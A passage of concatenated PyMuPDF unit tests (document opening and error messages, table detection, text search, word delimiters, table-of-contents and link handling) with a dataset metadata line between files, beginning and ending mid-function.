                        f'Incorrect exception, expected {etype}, received {type(e)=}.'
            else:
                assert 0, f'Did not received exception, expected {etype=}.'
        else:
            document = pymupdf.open(filename=filename, stream=stream, filetype=filetype)
            return document
    check(f'{resources}/1.pdf')
    check(f'{resources}/Bezier.epub')
    path = 1234
    etype = TypeError
    eregex = re.escape(f'bad filename: type(filename)=<class \'int\'> filename={path}.')
    check(path, exception=(etype, eregex))
    path = 'test_open-this-file-will-not-exist'
    etype = pymupdf.FileNotFoundError
    eregex = f'no such file: \'{path}\''
    check(path, exception=(etype, eregex))
    path = resources
    etype = pymupdf.FileDataError
    eregex = re.escape(f'\'{path}\' is no file')
    check(path, exception=(etype, eregex))
    path = relpath(os.path.abspath(f'{resources}/../test_open_empty'))
    path = path.replace(os.sep, '/')
    with open(path, 'w') as f:
        pass
    etype = pymupdf.EmptyFileError
    eregex = re.escape(f'Cannot open empty file: filename={path!r}.')
    check(path, exception=(etype, eregex))
    path = f'{resources}/1.pdf'
    filetype = 'xps'
    etype = pymupdf.FileDataError
    # 2023-12-12: On OpenBSD, for some reason the SWIG catch code only catches
    # the exception as FzErrorBase.
    etype2 = 'FzErrorBase' if platform.system() == 'OpenBSD' else 'FzErrorFormat'
    eregex = (
        # With a sysinstall with separate MuPDF install, we get
        # `mupdf.FzErrorFormat` instead of `pymupdf.mupdf.FzErrorFormat`. So
        # we just search for the former.
        re.escape(f'mupdf.{etype2}: code=7: cannot recognize zip archive'),
        re.escape(f'pymupdf.FileDataError: Failed to open file {path!r} as type {filetype!r}.'),
    )
    check(path, filetype=filetype, exception=(etype, eregex))
    path = f'{resources}/chinese-tables.pickle'
    etype = pymupdf.FileDataError
    etype2 = 'FzErrorBase' if platform.system() == 'OpenBSD' else 'FzErrorUnsupported'
    etext = (
        re.escape(f'mupdf.{etype2}: code=6: cannot find document handler for file: {path}'),
        re.escape(f'pymupdf.FileDataError: Failed to open file {path!r}.'),
    )
    check(path, exception=(etype, etext))
    stream = 123
    etype = TypeError
    etext = re.escape('bad stream: type(stream)=<class \'int\'>.')
    check(stream=stream, exception=(etype, etext))
    check(stream=b'', exception=(pymupdf.EmptyFileError, re.escape('Cannot open empty stream.')))
def test_533():
    """Iterating a Document in several equivalent ways must work (issue #533).

    The three loop forms below are the test content - each must iterate all
    pages without raising.
    """
    if not hasattr(pymupdf, 'mupdf'):
        print('test_533(): Not running on classic.')
        return
    path = os.path.abspath(f'{__file__}/../../tests/resources/2.pdf')
    doc = pymupdf.open(path)
    print()
    for p in doc:
        print(f'test_533(): for p in doc: {p=}.')
    for p in list(doc)[:]:
        print(f'test_533(): for p in list(doc)[:]: {p=}.')
    for p in doc[:]:
        print(f'test_533(): for p in doc[:]: {p=}.')
def test_3354():
    """Assigning Document.metadata must round-trip unchanged (issue #3354)."""
    expected = dict(foo='bar')
    document = pymupdf.open(filename)
    document.metadata = expected
    assert document.metadata == expected
def test_scientific_numbers():
    """Issue #3381: content streams must not use scientific notation.

    Fixed in MuPDF 1.24.2; earlier versions are expected to still emit it.
    """
    doc = pymupdf.open()
    page = doc.new_page(width=595, height=842)
    page.insert_text(pymupdf.Point(1e-11, -1e-10), "Test")
    contents = page.read_contents()
    print(f'{contents=}')
    fixed = pymupdf.mupdf_version_tuple >= (1, 24, 2)
    assert (b" 1e-" not in contents) == fixed
def test_3615():
    """Opening this EPUB must expose pagemode/pagelayout and warn (issue #3615)."""
    print('')
    print(f'{pymupdf.pymupdf_version=}', flush=1)
    print(f'{pymupdf.VersionBind=}', flush=1)
    path = os.path.normpath(f'{__file__}/../../tests/resources/test_3615.epub')
    doc = pymupdf.open(path)
    print(doc.pagemode)
    print(doc.pagelayout)
    # Accessing the properties above must have produced MuPDF warnings.
    assert pymupdf.TOOLS.mupdf_warnings()
def test_3654():
    """Opening and extracting text from this DOCX must work (issue #3654)."""
    path = os.path.normpath(f'{__file__}/../../tests/resources/test_3654.docx')
    with pymupdf.open(path) as document:
        pieces = [page.get_text() + '\n\n' for page in document]
    content = ''.join(pieces).strip()
    # As of 2024-07-04 we get a warning for this input file.
    wt = pymupdf.TOOLS.mupdf_warnings()
    assert wt == 'dropping unclosed output'
def test_3727():
    """Rendering this file must not crash (issue #3727).

    MuPDF < 1.24.9 is known to segfault on it, so we skip on older versions.
    """
    if pymupdf.mupdf_version_tuple < (1, 24, 9):
        # Bug fix: this diagnostic was missing its f-string prefix, so it
        # printed the literal '{pymupdf.mupdf_version=}'.
        print(f'test_3727(): not running because known to segv: {pymupdf.mupdf_version=}')
        return
    path = os.path.normpath(f'{__file__}/../../tests/resources/test_3727.pdf')
    doc = pymupdf.open(path)
    for page in doc:
        page.get_pixmap(matrix=pymupdf.Matrix(2, 2))
def test_3569():
    """Compare exact SVG output of Page.get_svg_image() (issue #3569)."""
    path = os.path.normpath(f'{__file__}/../../tests/resources/test_3569.pdf')
    document = pymupdf.open(path)
    page = document[0]
    svg = page.get_svg_image(text_as_path=False)
    print(f'{svg=}')
    # The SVG must match this reference byte-for-byte.
    assert svg == (
            '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape" version="1.1" width="3024" height="2160" viewBox="0 0 3024 2160">\n'
            '<defs>\n'
            '<clipPath id="clip_1">\n'
            '<path transform="matrix(0,-.06,-.06,-0,3024,2160)" d="M25432 10909H29692V15642H25432V10909"/>\n'
            '</clipPath>\n'
            '<clipPath id="clip_2">\n'
            '<path transform="matrix(0,-.06,-.06,-0,3024,2160)" d="M28526 38017 31807 40376V40379L31312 41314V42889H28202L25092 42888V42887L28524 38017H28526"/>\n'
            '</clipPath>\n'
            '</defs>\n'
            '<g clip-path="url(#clip_1)">\n'
            '<g inkscape:groupmode="layer" inkscape:label="CED - Text">\n'
            '<text xml:space="preserve" transform="matrix(.06 0 0 .06 3024 2160)" font-size="174.644" font-family="ArialMT"><tspan y="-28538" x="-14909 -14841.063 -14773.127 -14676.024 -14578.922 -14520.766 -14423.663">**L1-13</tspan></text>\n'
            '</g>\n'
            '</g>\n'
            '<g clip-path="url(#clip_2)">\n'
            '<g inkscape:groupmode="layer" inkscape:label="Level 03|S-COLS">\n'
            '<path transform="matrix(0,-.06,-.06,-0,3024,2160)" d="M31130 41483V42083L30530 41483ZM31130 42083 30530 41483V42083Z" fill="#7f7f7f"/>\n'
            '<path transform="matrix(0,-.06,-.06,-0,3024,2160)" stroke-width="0" stroke-linecap="butt" stroke-miterlimit="10" stroke-linejoin="miter" fill="none" stroke="#7f7f7f" d="M31130 41483V42083L30530 41483ZM31130 42083 30530 41483V42083Z"/>\n'
            '<path transform="matrix(0,-.06,-.06,-0,3024,2160)" stroke-width="9" stroke-linecap="round" stroke-linejoin="round" fill="none" stroke="#7f7f7f" d="M30530 41483H31130V42083H30530V41483"/>\n'
            '</g>\n'
            '</g>\n'
            '</svg>\n'
            )
    # Rendering this file is known to produce exactly these warnings.
    wt = pymupdf.TOOLS.mupdf_warnings()
    assert wt == 'unknown cid collection: PDFAUTOCAD-Indentity0\nnon-embedded font using identity encoding: ArialMT (mapping via )\ninvalid marked content and clip nesting'
def test_3450():
    """Show rendering time for a file that used to be very slow (issue #3450).

    This issue is a slow-down, so we just show time taken - it's not safe
    to fail if test takes too long because that can give spurious failures
    depending on hardware etc.

    On a mac-mini, PyMuPDF-1.24.8 takes 60s, PyMuPDF-1.24.9 takes 4s.
    """
    path = os.path.normpath(f'{__file__}/../../tests/resources/test_3450.pdf')
    pdf = pymupdf.open(path)
    page = pdf[0]
    t = time.time()
    # The pixmap itself is irrelevant - we only time the call.
    page.get_pixmap(alpha=False, dpi=150)
    t = time.time() - t
    print(f'test_3450(): {t=}')
def test_3859():
    """Check availability and type of pymupdf.mupdf.PDF_NULL/TRUE/FALSE.

    These constants exist only with MuPDF > 1.24.9 and must be PdfObj
    instances; older versions must not expose them.
    """
    if pymupdf.mupdf_version_tuple > (1, 24, 9):
        print(f'{pymupdf.mupdf.PDF_NULL=}.')
        print(f'{pymupdf.mupdf.PDF_TRUE=}.')
        print(f'{pymupdf.mupdf.PDF_FALSE=}.')
        for name in ('NULL', 'TRUE', 'FALSE'):
            name2 = f'PDF_{name}'
            v = getattr(pymupdf.mupdf, name2)
            print(f'{name=} {name2=} {v=} {type(v)=}')
            assert type(v)==pymupdf.mupdf.PdfObj, f'`v` is not a pymupdf.mupdf.PdfObj.'
    else:
        assert not hasattr(pymupdf.mupdf, 'PDF_TRUE')
def test_3905():
    """Opening CSV data must raise FileDataError and emit repair warnings."""
    data = b'A,B,C,D\r\n1,2,1,2\r\n2,2,1,2\r\n'
    raised = False
    try:
        pymupdf.open(stream=data)
    except pymupdf.FileDataError:
        raised = True
    assert raised
    wt = pymupdf.TOOLS.mupdf_warnings()
    assert wt == 'format error: cannot recognize version marker\ntrying to repair broken xref\nrepairing PDF document'
def test_3624():
    """Render page 0 and compare against a reference PNG (issue #3624)."""
    path = os.path.normpath(f'{__file__}/../../tests/resources/test_3624.pdf')
    path_png_expected = os.path.normpath(f'{__file__}/../../tests/resources/test_3624_expected.png')
    path_png = os.path.normpath(f'{__file__}/../../tests/test_3624.png')
    with pymupdf.open(path) as document:
        pixmap = document[0].get_pixmap(matrix=pymupdf.Matrix(2, 2))
        print(f'Saving to {path_png=}.')
        pixmap.save(path_png)
    rms = gentle_compare.pixmaps_rms(path_png_expected, path_png)
    if pymupdf.mupdf_version_tuple < (1, 24, 10):
        assert rms > 12
    else:
        # We get small differences in sysinstall tests, where some
        # thirdparty libraries can differ.
        assert rms < 1
import os
import io
from pprint import pprint
import pymupdf
import pickle
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "chinese-tables.pdf")
pickle_file = os.path.join(scriptdir, "resources", "chinese-tables.pickle")
def test_table1():
    """Compare pickled tables with those of the current run."""
    doc = pymupdf.open(filename)
    page = doc[0]
    tabs = page.find_tables()
    cells = tabs[0].cells + tabs[1].cells  # all table cell tuples on page
    extracts = [tabs[0].extract(), tabs[1].extract()]  # all table cell content
    # Bug fix: the pickle file handle was opened without ever being closed -
    # read the previously saved data via a context manager.
    with open(pickle_file, "rb") as pickle_in:
        old_data = pickle.load(pickle_in)
    # Compare cell contents
    assert old_data["extracts"] == extracts  # same cell contents
    # Compare cell coordinates.
    # Cell rectangles may get somewhat larger due to more cautious border
    # computations, but any differences must be small.
    old_cells = old_data["cells"][0] + old_data["cells"][1]
    assert len(cells) == len(old_cells)
    for new_cell, old_cell in zip(cells, old_cells):
        c1 = pymupdf.Rect(new_cell)  # new cell coordinates
        c0 = pymupdf.Rect(old_cell)  # old cell coordinates
        assert c0 in c1  # always: old contained in new
        assert abs(c1 - c0) < 0.2  # difference must be small
def test_table2():
    """Confirm header properties."""
    doc = pymupdf.open(filename)
    page = doc[0]
    tab1, tab2 = page.find_tables().tables
    # both tables contain their header data
    for tab in (tab1, tab2):
        assert tab.header.external == False
        assert tab.header.cells == tab.rows[0].cells
def test_2812():
    """Ensure table detection and extraction independent from page rotation.
    Make 4 pages with rotations 0, 90, 180 and 270 degrees respectively.
    Each page shows the same 8x5 table.
    We will check that each table is detected and delivers the same content.
    """
    def make_page(doc, rotation, rows, cols, landscape, label):
        # Append one page showing a rows x cols grid, with cell text produced
        # by label(i, j), text rotated by `rotation`, page rotation set to
        # match so the table always *appears* as the same 8x5 table.
        if landscape:
            page = doc.new_page(width=842, height=595)
        else:
            page = doc.new_page()
        rect = page.rect + (72, 72, -72, -72)
        # define the cells, draw the grid and insert unique text in each cell.
        cells = pymupdf.make_table(rect, rows=rows, cols=cols)
        for i in range(rows):
            for j in range(cols):
                page.draw_rect(cells[i][j])
        for i in range(rows):
            for j in range(cols):
                page.insert_textbox(
                    cells[i][j],
                    label(i, j),
                    rotate=rotation,
                    align=pymupdf.TEXT_ALIGN_CENTER,
                )
        if rotation:
            page.set_rotation(rotation)
        page.clean_contents()

    doc = pymupdf.open()
    # The label formulas are the originals with rows/cols substituted in.
    make_page(doc, 0, 8, 5, True, lambda i, j: f"cell[{i}][{j}]")
    make_page(doc, 90, 5, 8, False, lambda i, j: f"cell[{j}][{4 - i}]")
    make_page(doc, 180, 8, 5, True, lambda i, j: f"cell[{7 - i}][{4 - j}]")
    make_page(doc, 270, 5, 8, False, lambda i, j: f"cell[{7 - j}][{i}]")
    pdfdata = doc.tobytes()
    doc.close()
    # -------------------------------------------------------------------------
    # Test PDF prepared. Extract table on each page and
    # ensure identical extracted table data.
    # -------------------------------------------------------------------------
    doc = pymupdf.open("pdf", pdfdata)
    extracts = []
    for page in doc:
        tabs = page.find_tables()
        assert len(tabs.tables) == 1
        tab = tabs[0]
        fp = io.StringIO()
        pprint(tab.extract(), stream=fp)
        extracts.append(fp.getvalue())
        assert tab.row_count == 8
        assert tab.col_count == 5
    e0 = extracts[0]
    for e in extracts[1:]:
        assert e == e0
def test_2979():
    """This tests fix #2979 and #3001.
    2979: identical cell count for each row
    3001: no change of global glyph heights
    """
    filename = os.path.join(scriptdir, "resources", "test_2979.pdf")
    doc = pymupdf.open(filename)
    page = doc[0]
    tab = page.find_tables()[0]  # extract the table
    # test 2979: every extracted row must have the same number of cells
    lengths = {len(row) for row in tab.extract()}
    assert len(lengths) == 1
    # test 3001
    assert (
        pymupdf.TOOLS.set_small_glyph_heights() is False
    ), f"{pymupdf.TOOLS.set_small_glyph_heights()=}"
def test_3062():
    """Tests the fix for #3062.
    After table extraction, a rotated page should behave and look
    like as before."""
    filename = os.path.join(scriptdir, "resources", "test_3062.pdf")
    doc = pymupdf.open(filename)
    page = doc[0]
    cells0 = page.find_tables()[0].cells
    # drop and re-load the page - the second extraction must not differ
    page = None
    page = doc[0]
    cells1 = page.find_tables()[0].cells
    assert cells1 == cells0
def test_strict_lines():
    """Confirm that ignoring borderless rectangles improves table detection."""
    filename = os.path.join(scriptdir, "resources", "strict-yes-no.pdf")
    doc = pymupdf.open(filename)
    page = doc[0]
    tab_default = page.find_tables()[0]
    tab_strict = page.find_tables(strategy="lines_strict")[0]
    # the strict strategy must detect a smaller table
    assert tab_strict.row_count < tab_default.row_count
    assert tab_strict.col_count < tab_default.col_count
def test_add_lines():
    """Test new parameter add_lines for table recognition."""
    filename = os.path.join(scriptdir, "resources", "small-table.pdf")
    doc = pymupdf.open(filename)
    page = doc[0]
    # without extra hints, no table is detected at all
    assert page.find_tables().tables == []
    x_coords = (238.9949951171875, 334.5559997558594, 433.1809997558594)
    more_lines = [((x, 200.0), (x, 300.0)) for x in x_coords]
    # these 3 additional vertical lines should additional 3 columns
    tab2 = page.find_tables(add_lines=more_lines)[0]
    assert tab2.col_count == 4
    assert tab2.row_count == 5
def test_3148():
    """Ensure correct extraction text of rotated text."""
    doc = pymupdf.open()
    page = doc.new_page()
    rect = pymupdf.Rect(100, 100, 300, 300)
    text = (
        "rotation 0 degrees",
        "rotation 90 degrees",
        "rotation 180 degrees",
        "rotation 270 degrees",
    )
    degrees = (0, 90, 180, 270)
    delta = (2, 2, -2, -2)
    cells = pymupdf.make_table(rect, cols=3, rows=4)
    # fill every cell with text rotated by 0/90/180/270 degrees in turn
    for i in range(3):
        for j in range(4):
            cell = cells[j][i]
            page.draw_rect(cell)
            k = (i + j) % 4
            page.insert_textbox(cell + delta, text[k], rotate=degrees[k])
    tab = page.find_tables()[0]
    # every extracted cell must equal one of the inserted strings
    for row in tab.extract():
        for item in row:
            assert item.replace("\n", " ") in text
def test_3179():
    """Test correct separation of multiple tables on page."""
    filename = os.path.join(scriptdir, "resources", "test_3179.pdf")
    doc = pymupdf.open(filename)
    found = doc[0].find_tables()
    assert len(found.tables) == 3
def test_battery_file():
    """Tests correctly ignoring non-table suspects.

    Earlier versions erroneously tried to identify table headers
    where there existed no table at all.
    """
    filename = os.path.join(scriptdir, "resources", "battery-file-22.pdf")
    doc = pymupdf.open(filename)
    assert len(doc[0].find_tables().tables) == 0
def test_markdown():
    """Confirm correct markdown output."""
    filename = os.path.join(scriptdir, "resources", "strict-yes-no.pdf")
    doc = pymupdf.open(filename)
    page = doc[0]
    tab = page.find_tables(strategy="lines_strict")[0]
    expected = "\n".join((
        "|Header1|Header2|Header3|",
        "|---|---|---|",
        "|Col11 Col12|Col21 Col22|Col31 Col32 Col33|",
        "|Col13|Col23|Col34 Col35|",
        "|Col14|Col24|Col36|",
        "|Col15|Col25 Col26||",
    )) + "\n\n"
    assert tab.to_markdown() == expected
def test_dotted_grid():
    """Confirm dotted lines are detected as gridlines."""
    filename = os.path.join(scriptdir, "resources", "dotted-gridlines.pdf")
    doc = pymupdf.open(filename)
    page = doc[0]
    tabs = page.find_tables()
    assert len(tabs.tables) == 3  # must be 3 tables
    t0, t1, t2 = tabs  # extract them
    # check that they have expected dimensions.
    # Bug fix: `assert a, b == x` only asserted `a` (with `b == x` used as
    # the assert message), so the dimension checks never actually ran.
    assert (t0.row_count, t0.col_count) == (11, 12)
    assert (t1.row_count, t1.col_count) == (25, 11)
    assert (t2.row_count, t2.col_count) == (1, 10)
"""
"test_search1":
Search for some text on a PDF page, and compare content of returned hit
rectangle with the searched text.
"test_search2":
Text search with 'clip' parameter - clip rectangle contains two occurrences
of searched text. Confirm search locations are inside clip.
"""
import os
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename1 = os.path.join(scriptdir, "resources", "2.pdf")
filename2 = os.path.join(scriptdir, "resources", "github_sample.pdf")
filename3 = os.path.join(scriptdir, "resources", "text-find-ligatures.pdf")
def test_search1():
    """Each hit rectangle must actually contain the searched-for text."""
    doc = pymupdf.open(filename1)
    page = doc[0]
    needle = "mupdf"
    hit_rects = page.search_for(needle)
    assert hit_rects != []
    for hit in hit_rects:
        assert needle in page.get_textbox(hit).lower()
def test_search2():
    """Search with a clip rectangle: both hits must lie inside the clip."""
    doc = pymupdf.open(filename2)
    page = doc[0]
    clip = pymupdf.Rect(40.5, 228.31436157226562, 346.5226135253906, 239.5338592529297)
    hits = page.search_for("the", clip=clip)
    assert len(hits) == 2
    assert all(r in clip for r in hits)
def test_search3():
    """Ensure we find text whether or not it contains ligatures."""
    doc = pymupdf.open(filename3)
    page = doc[0]
    needle = "flag"
    # default search flags dissolve ligatures - both occurrences are found
    assert len(page.search_for(needle, flags=pymupdf.TEXTFLAGS_SEARCH)) == 2
    # preserving ligatures hides the occurrence written with a ligature
    flags = pymupdf.TEXTFLAGS_SEARCH | pymupdf.TEXT_PRESERVE_LIGATURES
    assert len(page.search_for(needle, flags=flags)) == 1
import pymupdf
import string
def test_delimiters():
    """Test changing word delimiting characters."""
    doc = pymupdf.open()
    page = doc.new_page()
    text = "word1,word2 - word3. word4?word5."
    page.insert_text((50, 50), text)
    def words(**kwargs):
        return [w[4] for w in page.get_text("words", **kwargs)]
    # Standard words extraction:
    # only spaces and line breaks start a new word
    words0 = words()
    assert words0 == ["word1,word2", "-", "word3.", "word4?word5."]
    # extract again, treating all punctuation as word delimiters
    words1 = words(delimiters=string.punctuation)
    assert words1 != words0
    assert " ".join(words1) == "word1 word2 word3 word4 word5"
    # confirm the default extraction is unchanged
    assert words() == words0
"""
* Verify equality of generated TOCs and expected results.
* Verify TOC deletion works
* Verify manipulation of single TOC item works
* Verify stability against circular TOC items
"""
import os
import sys
import pymupdf
import pathlib
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "001003ED.pdf")
filename2 = os.path.join(scriptdir, "resources", "2.pdf")
circular = os.path.join(scriptdir, "resources", "circular-toc.pdf")
full_toc = os.path.join(scriptdir, "resources", "full_toc.txt")
simple_toc = os.path.join(scriptdir, "resources", "simple_toc.txt")
file_3820 = os.path.join(scriptdir, "resources", "test-3820.pdf")
doc = pymupdf.open(filename)
def test_simple_toc():
    """Generated simple TOC must equal the stored expected result."""
    # Bug fix: read the expected data via a context manager instead of
    # leaking the file handle.
    with open(simple_toc, "rb") as f:
        simple_lines = f.read()
    toc = b"".join([str(t).encode() for t in doc.get_toc(True)])
    assert toc == simple_lines
def test_full_toc():
    """Verify the detailed (simple=False) TOC against a stored snapshot."""
    if not hasattr(pymupdf, "mupdf"):
        # Classic implementation does not have fix for this test.
        print(f"Not running test_full_toc on classic implementation.")
        return
    expected_path = f"{scriptdir}/resources/full_toc.txt"
    # Github windows x32 seems to insert \r characters; maybe something to
    # do with the Python installation's line endings settings.
    expected = pathlib.Path(expected_path).read_bytes().decode("utf8")
    expected = expected.replace('\r', '')
    actual = "\n".join(str(item) for item in doc.get_toc(False)) + "\n"
    assert actual == expected
def test_erase_toc():
    """Setting an empty TOC must leave the document without outline items."""
    doc.set_toc(list())
    assert not doc.get_toc()
def test_replace_toc():
    """A TOC read from the document can be written back unchanged."""
    current = doc.get_toc(False)
    doc.set_toc(current)
def test_setcolors():
    """Update color/bold/italic of every TOC item and verify persistence."""
    document = pymupdf.open(filename2)
    toc = document.get_toc(False)
    for idx in range(len(toc)):
        props = toc[idx][3]
        props["color"] = (1, 0, 0)
        props["bold"] = True
        props["italic"] = True
        document.set_toc_item(idx, dest_dict=props)
    # Re-read and confirm every item carries the new attributes.
    modified = document.get_toc(False)
    assert len(modified) == len(toc)
    for item in modified:
        props = item[3]
        assert props["bold"]
        assert props["italic"]
        assert props["color"] == (1, 0, 0)
def test_circular():
    """Reading a TOC containing circular bookmarks must not loop forever."""
    document = pymupdf.open(circular)
    document.get_toc(False)  # must terminate despite the cycle
    if hasattr(pymupdf, 'mupdf'):
        # Rebased implementation reports the repair as a warning.
        wt = pymupdf.TOOLS.mupdf_warnings()
        assert wt == 'Bad or missing prev pointer in outline tree, repairing', \
                f'{wt=}'
def test_2355():
    """Repeated TOC reads after save/reopen must work (issue #2355)."""
    doc = pymupdf.Document()
    for _ in range(10):
        doc.new_page(doc.page_count)
    doc.set_toc([[1, 'test', 1], [1, 'test2', 5]])
    path = 'test_2355.pdf'
    doc.save(path)
    # Reopen and read the TOC many times.
    for _ in range(10):
        with pymupdf.open(path) as new_doc:
            new_doc.get_toc()
    # Open once, then read the TOC many times.
    with pymupdf.open(path) as new_doc:
        for _ in range(10):
            new_doc.get_toc()
def test_2788():
    '''
    Check handling of Document.get_toc() when toc item has kind=4.
    '''
    if not hasattr(pymupdf, 'mupdf'):
        # Classic implementation does not have fix for this test.
        print(f'Not running test_2788 on classic implementation.')
        return
    path = os.path.abspath(f'{__file__}/../../tests/resources/test_2788.pdf')
    document = pymupdf.open(path)
    # Expected single TOC item: a kind=4 (named destination) entry.
    toc0 = [[1, 'page2', 2, {'kind': 4, 'xref': 14, 'page': 1, 'to': pymupdf.Point(100.0, 760.0), 'zoom': 0.0, 'nameddest': 'page.2'}]]
    toc1 = document.get_toc(simple=False)
    print(f'{toc0=}')
    print(f'{toc1=}')
    assert toc1 == toc0
    # NOTE(review): this targets the module-level `doc`, not `document` -
    # possibly a typo for document.set_toc(toc0), which would make the
    # following assert a real round-trip check; confirm before changing.
    doc.set_toc(toc0)
    toc2 = document.get_toc(simple=False)
    print(f'{toc0=}')
    print(f'{toc2=}')
    assert toc2 == toc0
    # Also test Page.get_links() bugfix from #2817.
    for page in document:
        page.get_links()
    rebased = hasattr(pymupdf, 'mupdf')
    if rebased:
        # The damaged input triggers a repair; verify the exact warnings.
        wt = pymupdf.TOOLS.mupdf_warnings()
        assert wt == (
                "syntax error: expected 'obj' keyword (0 3 ?)\n"
                "trying to repair broken xref\n"
                "repairing PDF document"
                ), f'{wt=}'
def test_toc_count():
    """Round-trip a TOC (clear then restore) and dump the /Outlines object.

    Saves with garbage collection and re-reads the output file; clears
    accumulated PyMuPDF log items at the end.
    """
    file_in = os.path.abspath(f'{__file__}/../../tests/resources/test_toc_count.pdf')
    file_out = os.path.abspath(f'{__file__}/../../tests/test_toc_count_out.pdf')
    def get(doc):
        # Return the raw PDF object behind the catalog's /Outlines key.
        outlines = doc.xref_get_key(doc.pdf_catalog(), "Outlines")
        ret = doc.xref_object(int(outlines[1].split()[0]))
        return ret
    print()
    with pymupdf.open(file_in) as doc:
        print(f'1: {get(doc)}')
        toc = doc.get_toc(simple=False)
        doc.set_toc([])
        #print(f'2: {get(doc)}')
        doc.set_toc(toc)
        print(f'3: {get(doc)}')
        doc.save(file_out, garbage=4)
    with pymupdf.open(file_out) as doc:
        print(f'4: {get(doc)}')
    pymupdf._log_items_clear()
def test_3347():
    '''
    Check fix for #3347 - link destination rectangles when source/destination
    pages have different sizes.
    '''
    doc = pymupdf.open()
    doc.new_page(width=500, height=800)
    doc.new_page(width=800, height=500)
    # (page number, rectangle, draw color) for four link areas.
    rects = [
        (0, pymupdf.Rect(10, 20, 50, 40), pymupdf.utils.getColor('red')),
        (0, pymupdf.Rect(300, 350, 400, 450), pymupdf.utils.getColor('green')),
        (1, pymupdf.Rect(20, 30, 40, 50), pymupdf.utils.getColor('blue')),
        (1, pymupdf.Rect(350, 300, 450, 400), pymupdf.utils.getColor('black'))
    ]
    for page, rect, color in rects:
        doc[page].draw_rect(rect, color=color)
    # Chain each rect to the next (wrapping around) as a GOTO link.
    for (from_page, from_rect, _), (to_page, to_rect, _) in zip(rects, rects[1:] + rects[:1]):
        doc[from_page].insert_link({
            'kind': 1,
            'from': from_rect,
            'page': to_page,
            'to': to_rect.top_left,
        })
    # Pinned expectation: (page number, extracted link dict) per link.
    links_expected = [
        (0, {'kind': 1, 'xref': 11, 'from': pymupdf.Rect(10.0, 20.0, 50.0, 40.0), 'page': 0, 'to': pymupdf.Point(300.0, 350.0), 'zoom': 0.0, 'id': 'jorj-L0'}),
        (0, {'kind': 1, 'xref': 12, 'from': pymupdf.Rect(300.0, 350.0, 400.0, 450.0), 'page': 1, 'to': pymupdf.Point(20.0, 30.0), 'zoom': 0.0, 'id': 'jorj-L1'}),
        (1, {'kind': 1, 'xref': 13, 'from': pymupdf.Rect(20.0, 30.0, 40.0, 50.0), 'page': 1, 'to': pymupdf.Point(350.0, 300.0), 'zoom': 0.0, 'id': 'jorj-L0'}),
        (1, {'kind': 1, 'xref': 14, 'from': pymupdf.Rect(350.0, 300.0, 450.0, 400.0), 'page': 0, 'to': pymupdf.Point(10.0, 20.0), 'zoom': 0.0, 'id': 'jorj-L1'}),
    ]
    path = os.path.normpath(f'{__file__}/../../tests/test_3347_out.pdf')
    doc.save(path)
    print(f'Have saved to {path=}.')
    links_actual = list()
    for page_i, page in enumerate(doc):
        links = page.get_links()
        for link_i, link in enumerate(links):
            print(f'{page_i=} {link_i=}: {link!r}')
            links_actual.append( (page_i, link) )
    assert links_actual == links_expected
def test_3400():
    '''
    Check fix for #3400 - link destination rectangles when source/destination
    pages have different rotations.
    '''
    width = 750
    height = 1110
    circle_middle_point = pymupdf.Point(height / 4, width / 4)
    print(f'{circle_middle_point=}')
    with pymupdf.open() as doc:
        page = doc.new_page(width=width, height=height)
        page.set_rotation(270)
        # draw a circle at the middle point to facilitate debugging
        page.draw_circle(circle_middle_point, color=(0, 0, 1), radius=5, width=2)
        # Draw a 10x10 grid of tiny dots with their coordinates as labels.
        for i in range(10):
            for j in range(10):
                x = i/10 * width
                y = j/10 * height
                page.draw_circle(pymupdf.Point(x, y), color=(0,0,0), radius=0.2, width=0.1)
                page.insert_htmlbox(pymupdf.Rect(x, y, x+width/10, y+height/20), f'<small><small><small><small>({x=:.1f},{y=:.1f})</small></small></small></small>', )
        # rotate the middle point by the page rotation for the new toc entry
        toc_link_coords = circle_middle_point
        print(f'{toc_link_coords=}')
        toc = [
            (
                1,
                "Link to circle",
                1,
                {
                    "kind": pymupdf.LINK_GOTO,
                    "page": 1,
                    "to": toc_link_coords,
                    "from": pymupdf.Rect(0, 0, height / 4, width / 4),
                },
            )
        ]
        doc.set_toc(toc, 0)  # set the toc
        # Second page (unrotated, different size) with a link back to page 0.
        page = doc.new_page(width=200, height=300)
        from_rect = pymupdf.Rect(10, 10, 100, 50)
        page.insert_htmlbox(from_rect, 'link')
        link = dict()
        link['from'] = from_rect
        link['kind'] = pymupdf.LINK_GOTO
        link['to'] = toc_link_coords
        link['page'] = 0
        page.insert_link(link)
        path = os.path.normpath(f'{__file__}/../../tests/test_3400.pdf')
        doc.save(path)
        print(f'Saved to {path=}.')
        # Pinned expectation for the extracted link on page 1.
        links_expected = [
            (1, {'kind': 1, 'xref': 1120, 'from': pymupdf.Rect(10.0, 10.0, 100.0, 50.0), 'page': 0, 'to': pymupdf.Point(187.5, 472.5), 'zoom': 0.0, 'id': 'jorj-L0'})
        ]
        links_actual = list()
        for page_i, page in enumerate(doc):
            links = page.get_links()
            for link_i, link in enumerate(links):
                print(f'({page_i}, {link!r})')
                links_actual.append( (page_i, link) )
        assert links_actual == links_expected
def test_3820():
    """Every extended TOC item must carry a page-based destination."""
    document = pymupdf.open(file_3820)
    for _level, _title, epage, dest in document.get_toc(simple=False):
        # TOC page numbers are 1-based, dest dict pages are 0-based.
        assert epage == dest["page"] + 1
| 9,763 | Python | .py | 237 | 33.160338 | 169 | 0.576624 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,350 | test_tesseract.py | pymupdf_PyMuPDF/tests/test_tesseract.py | import os
import platform
import pymupdf
def test_tesseract():
    '''
    This checks that MuPDF has been built with tesseract support.
    By default we don't supply a valid `tessdata` directory, and just assert
    that attempting to use Tesseract raises the expected error (which checks
    that MuPDF is built with Tesseract support).
    But if TESSDATA_PREFIX is set in the environment, we assert that
    FzPage.get_textpage_ocr() succeeds.
    '''
    path = os.path.abspath( f'{__file__}/../resources/2.pdf')
    doc = pymupdf.open( path)
    page = doc[5]
    # Expected error text/type differs by implementation and MuPDF version.
    if hasattr(pymupdf, 'mupdf'):
        # rebased.
